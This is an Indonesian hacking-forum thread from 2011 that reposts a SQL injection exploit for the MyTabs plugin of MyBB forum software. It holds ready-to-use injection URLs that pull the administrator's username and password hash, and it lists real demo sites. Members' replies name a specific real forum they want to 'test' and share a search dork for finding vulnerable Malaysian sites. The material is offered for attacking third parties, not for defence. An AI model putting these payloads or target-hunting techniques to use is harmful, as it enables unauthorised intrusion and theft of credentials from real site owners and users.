.:: Blackc0de Forum ::.
Would you like to react to this message? Create an account in a few clicks or log in to continue.

-=Explore The World From Our Binary=-
 
HomeIndeksLatest imagesPendaftaranLogin

.:: Blackc0de Forum ::. :: Information Technology :: Exploits
 

 MyBB 0day \ MyTabs (plugin) Blind SQL injection vulnerability

Go down 
+3
iroel
Banditcode
zer03s
7 posters
PengirimMessage
zer03s
Administrator
Administrator
zer03s


Jumlah posting : 2471
Points : 4119
Reputation : 113
Join date : 13.12.10
Age : 32
Lokasi : /home/root/blackc0de

MyBB 0day \ MyTabs (plugin) Blind SQL injection vulnerability Empty
PostSubyek: MyBB 0day MyTabs (plugin) Blind SQL injection vulnerability   MyBB 0day \ MyTabs (plugin) Blind SQL injection vulnerability Icon_minitimeWed Aug 03, 2011 1:10 am
ini exploit temuan di jalan tadi dan masih fresh MyBB 0day \ MyTabs (plugin) Blind SQL injection vulnerability 772168924
hati-hati bagi pengguna forum myBB ada exploitnya tuw,,untung ni forum ga pake myBB, pakenya PHPBB jadi amaan MyBB 0day \ MyTabs (plugin) Blind SQL injection vulnerability 3402572103 cekidot....

Quote :
=====================================================================
MyBB 0day \ MyTabs (plugin) SQL injection vulnerability
=====================================================================

# Exploit title : MyBB 0day \ MyTabs (plugin) SQL injection vulnerability.
# Author: AutoRUN & dR.sqL
# Home : HackForums.AL , Autorun-Albania.COM , HackingWith.US , whiteh4t.com
# Date : 01 \ 08 \ 2011
# Tested on : Windows XP , Linux
# Category : web apps
# Software Link : http://mods.mybb.com/view/mytabs
# Google dork : Use your mind kid ^_^ !

Vulnerability :

$~ http://localhost/mybbpath/index.php?tab=[SQLi]

---------------------------------------
# ~ Expl0itation ~ #
---------------------------------------

$~ Get the administrator's username (usually it has uid=1) ~

http://localhost/mybbpath/index.php?tab=1' and(select 1 from(select count(*),concat((select username from mybb_users where uid=1),floor(Rand(0)*2))a from information_schema.tables group by a)b)-- -

$~ Get the administrator's password ~

http://localhost/mybbpath/index.php?tab=1' and(select 1 from(select count(*),concat((select password from mybb_users where uid=1),floor(Rand(0)*2))a from information_schema.tables group by a)b)-- -


---------------------------------------
# ~ Demos ~ #
---------------------------------------

http://secworm.net/forums/index.php?tab=1' (secworm - Ethical Hacking & IT security forum - ROFL !)
http://icanhazcookie.net/index.php?tab=1'


_ _ ____ _ _ _ _ _ _ ____ _
/ \ _ _| |_ ___ | _ \| | | | \ | | __ _ _ __ __| | __| | _ \ ___ __ _| |
/ _ \| | | | __/ _ \| |_) | | | | \| | / _` | '_ \ / _` | / _` | |_) | / __|/ _` | |
/ ___ \ |_| | |_ (_) | _ <| |_| | |\ | | (_| | | | | (_| | | (_| | _ < _\__ \ (_| | |___
/_/ \_\__,_|\__\___/|_| \_\\___/|_| \_| \__,_|_| |_|\__,_| \__,_|_| \_(_)___/\__, |_____|
|_|



# Greetz : Programer , Dr.moka, eragon, BaDBoY-AL , z3r0w1zard , Red Dragon_aL , Pretorian ,Th3_Power , R-t33n , Ace Wizard, KubaNnez1 , ssgodfather, DJDukli , b4ti , CroSs HackForums.AL members & All our friends.



____ _ ____ ____ _ _ _ _ _
| _ \ _ __ ___ _ _ __| | |___ \| __ ) / \ | | |__ __ _ _ __ (_) __ _ _ __ | |
| |_) | '__/ _ \| | | |/ _` | __) | _ \ / _ \ | | '_ \ / _` | '_ \| |/ _` | '_ \ | |
| __/| | | (_) | |_| | (_| | / __/| |_) | / ___ \| | |_) | (_| | | | | | (_| | | | | |_|
|_| |_| \___/ \__,_|\__,_| |_____|____/ /_/ \_\_|_.__/ \__,_|_| |_|_|\__,_|_| |_| (_)


# 2011
Kembali Ke Atas Go down
http://zer03s.blog.com/
Banditcode
Top Nubie
Top Nubie
Banditcode


Jumlah posting : 42
Points : 71
Reputation : 2
Join date : 12.08.11

MyBB 0day \ MyTabs (plugin) Blind SQL injection vulnerability Empty
PostSubyek: Re: MyBB 0day \ MyTabs (plugin) Blind SQL injection vulnerability   MyBB 0day \ MyTabs (plugin) Blind SQL injection vulnerability Icon_minitimeFri Aug 12, 2011 2:33 am
masih banyak yang kena ini MyBB 0day \ MyTabs (plugin) Blind SQL injection vulnerability 772168924 hati-hati bagi forum pake myBB MyBB 0day \ MyTabs (plugin) Blind SQL injection vulnerability 1082720249
Kembali Ke Atas Go down
iroel
Top Nubie
Top Nubie



Jumlah posting : 31
Points : 39
Reputation : 0
Join date : 08.07.11

MyBB 0day \ MyTabs (plugin) Blind SQL injection vulnerability Empty
PostSubyek: Re: MyBB 0day \ MyTabs (plugin) Blind SQL injection vulnerability   MyBB 0day \ MyTabs (plugin) Blind SQL injection vulnerability Icon_minitimeFri Aug 12, 2011 3:51 am
ane kagak tau dorknya pak... MyBB 0day \ MyTabs (plugin) Blind SQL injection vulnerability 187827569
Kembali Ke Atas Go down
nesta
VIP Member
VIP Member
nesta


Jumlah posting : 810
Points : 896
Reputation : 42
Join date : 04.08.11
Age : 37
Lokasi : depan komputer

MyBB 0day \ MyTabs (plugin) Blind SQL injection vulnerability Empty
PostSubyek: Re: MyBB 0day \ MyTabs (plugin) Blind SQL injection vulnerability   MyBB 0day \ MyTabs (plugin) Blind SQL injection vulnerability Icon_minitimeFri Aug 12, 2011 4:09 am
kalo gak bisa berarti gak work dunk om?
ane mau nyoba test yang ini -> http://forum.nuruljadid.com/index.php
Kembali Ke Atas Go down
http://www.hacker-newbie.org
zer03s
Administrator
Administrator
zer03s


Jumlah posting : 2471
Points : 4119
Reputation : 113
Join date : 13.12.10
Age : 32
Lokasi : /home/root/blackc0de

MyBB 0day \ MyTabs (plugin) Blind SQL injection vulnerability Empty
PostSubyek: Re: MyBB 0day \ MyTabs (plugin) Blind SQL injection vulnerability   MyBB 0day \ MyTabs (plugin) Blind SQL injection vulnerability Icon_minitimeThu Aug 18, 2011 6:26 pm
nesta wrote:
kalo gak bisa berarti gak work dunk om?
ane mau nyoba test yang ini -> http://forum.nuruljadid.com/index.php

sayang dorknya ga di kasi om MyBB 0day \ MyTabs (plugin) Blind SQL injection vulnerability 489233 cuma di liatin contoh vurln nya aja,, tapi ga tw kalo sudah ada yang pernah coba,, soalnya ane pribadi blom nyobain, bingung nyari dorknya MyBB 0day \ MyTabs (plugin) Blind SQL injection vulnerability 3529815765
Kembali Ke Atas Go down
http://zer03s.blog.com/
nesta
VIP Member
VIP Member
nesta


Jumlah posting : 810
Points : 896
Reputation : 42
Join date : 04.08.11
Age : 37
Lokasi : depan komputer

MyBB 0day \ MyTabs (plugin) Blind SQL injection vulnerability Empty
PostSubyek: Re: MyBB 0day \ MyTabs (plugin) Blind SQL injection vulnerability   MyBB 0day \ MyTabs (plugin) Blind SQL injection vulnerability Icon_minitimeThu Aug 18, 2011 6:46 pm
zer03s!!! wrote:
nesta wrote:
kalo gak bisa berarti gak work dunk om?
ane mau nyoba test yang ini -> http://forum.nuruljadid.com/index.php

sayang dorknya ga di kasi om MyBB 0day \ MyTabs (plugin) Blind SQL injection vulnerability 489233 cuma di liatin contoh vurln nya aja,, tapi ga tw kalo sudah ada yang pernah coba,, soalnya ane pribadi blom nyobain, bingung nyari dorknya MyBB 0day \ MyTabs (plugin) Blind SQL injection vulnerability 3529815765

ow gitu ya om. kalo om tau dorknya di share disini ya om. pengen test tuh forum. MyBB 0day \ MyTabs (plugin) Blind SQL injection vulnerability 3529815765
Kembali Ke Atas Go down
http://www.hacker-newbie.org
CyberWild
Moderator
Moderator
CyberWild


Jumlah posting : 1665
Points : 2310
Reputation : 104
Join date : 11.06.11
Age : 43
Lokasi : internet cloud

MyBB 0day \ MyTabs (plugin) Blind SQL injection vulnerability Empty
PostSubyek: Re: MyBB 0day \ MyTabs (plugin) Blind SQL injection vulnerability   MyBB 0day \ MyTabs (plugin) Blind SQL injection vulnerability Icon_minitimeThu Aug 18, 2011 6:49 pm
zer03s!!! wrote:
ini exploit temuan di jalan tadi dan masih fresh MyBB 0day \ MyTabs (plugin) Blind SQL injection vulnerability 772168924
hati-hati bagi pengguna forum myBB ada exploitnya tuw,,untung ni forum ga pake myBB, pakenya PHPBB jadi amaan MyBB 0day \ MyTabs (plugin) Blind SQL injection vulnerability 3402572103 cekidot....

Quote :
=====================================================================
MyBB 0day \ MyTabs (plugin) SQL injection vulnerability
=====================================================================

# Exploit title : MyBB 0day \ MyTabs (plugin) SQL injection vulnerability.
# Author: AutoRUN & dR.sqL
# Home : HackForums.AL , Autorun-Albania.COM , HackingWith.US , whiteh4t.com
# Date : 01 \ 08 \ 2011
# Tested on : Windows XP , Linux
# Category : web apps
# Software Link : http://mods.mybb.com/view/mytabs
# Google dork : Use your mind kid ^_^ !

Vulnerability :

$~ http://localhost/mybbpath/index.php?tab=[SQLi]

---------------------------------------
# ~ Expl0itation ~ #
---------------------------------------

$~ Get the administrator's username (usually it has uid=1) ~

http://localhost/mybbpath/index.php?tab=1' and(select 1 from(select count(*),concat((select username from mybb_users where uid=1),floor(Rand(0)*2))a from information_schema.tables group by a)b)-- -

$~ Get the administrator's password ~

http://localhost/mybbpath/index.php?tab=1' and(select 1 from(select count(*),concat((select password from mybb_users where uid=1),floor(Rand(0)*2))a from information_schema.tables group by a)b)-- -


---------------------------------------
# ~ Demos ~ #
---------------------------------------

http://secworm.net/forums/index.php?tab=1' (secworm - Ethical Hacking & IT security forum - ROFL !)
http://icanhazcookie.net/index.php?tab=1'


_ _ ____ _ _ _ _ _ _ ____ _
/ \ _ _| |_ ___ | _ \| | | | \ | | __ _ _ __ __| | __| | _ \ ___ __ _| |
/ _ \| | | | __/ _ \| |_) | | | | \| | / _` | '_ \ / _` | / _` | |_) | / __|/ _` | |
/ ___ \ |_| | |_ (_) | _ <| |_| | |\ | | (_| | | | | (_| | | (_| | _ < _\__ \ (_| | |___
/_/ \_\__,_|\__\___/|_| \_\\___/|_| \_| \__,_|_| |_|\__,_| \__,_|_| \_(_)___/\__, |_____|
|_|



# Greetz : Programer , Dr.moka, eragon, BaDBoY-AL , z3r0w1zard , Red Dragon_aL , Pretorian ,Th3_Power , R-t33n , Ace Wizard, KubaNnez1 , ssgodfather, DJDukli , b4ti , CroSs HackForums.AL members & All our friends.



____ _ ____ ____ _ _ _ _ _
| _ \ _ __ ___ _ _ __| | |___ \| __ ) / \ | | |__ __ _ _ __ (_) __ _ _ __ | |
| |_) | '__/ _ \| | | |/ _` | __) | _ \ / _ \ | | '_ \ / _` | '_ \| |/ _` | '_ \ | |
| __/| | | (_) | |_| | (_| | / __/| |_) | / ___ \| | |_) | (_| | | | | | (_| | | | | |_|
|_| |_| \___/ \__,_|\__,_| |_____|____/ /_/ \_\_|_.__/ \__,_|_| |_|_|\__,_|_| |_| (_)


# 2011
nyobain ahkkk
Kembali Ke Atas Go down
http://cyberwild.p.ht/
kenahack
NuuBiiTooL
NuuBiiTooL
kenahack


Jumlah posting : 8
Points : 11
Reputation : 1
Join date : 07.09.11

MyBB 0day \ MyTabs (plugin) Blind SQL injection vulnerability Empty
PostSubyek: Re: MyBB 0day \ MyTabs (plugin) Blind SQL injection vulnerability   MyBB 0day \ MyTabs (plugin) Blind SQL injection vulnerability Icon_minitimeSat Oct 15, 2011 9:40 am
dork : "Powered by myBB" site:.my
target : index.php?tab=1

nyubaan ... inject nya kok ngak ngerti om :D
Kembali Ke Atas Go down
green.day
NuuBiiTooL
NuuBiiTooL



Jumlah posting : 9
Points : 9
Reputation : 0
Join date : 27.02.12

MyBB 0day \ MyTabs (plugin) Blind SQL injection vulnerability Empty
PostSubyek: Re: MyBB 0day \ MyTabs (plugin) Blind SQL injection vulnerability   MyBB 0day \ MyTabs (plugin) Blind SQL injection vulnerability Icon_minitimeMon Feb 27, 2012 9:51 pm
ijin tkp om semoga bisa xixixi
Kembali Ke Atas Go down
Sponsored content





MyBB 0day \ MyTabs (plugin) Blind SQL injection vulnerability Empty
PostSubyek: Re: MyBB 0day \ MyTabs (plugin) Blind SQL injection vulnerability   MyBB 0day \ MyTabs (plugin) Blind SQL injection vulnerability Icon_minitime
Kembali Ke Atas Go down
 
MyBB 0day \ MyTabs (plugin) Blind SQL injection vulnerability
Kembali Ke Atas 
Halaman 1 dari 1

Permissions in this forum:Anda tidak dapat menjawab topik
.:: Blackc0de Forum ::. :: Information Technology :: Exploits-
Navigasi: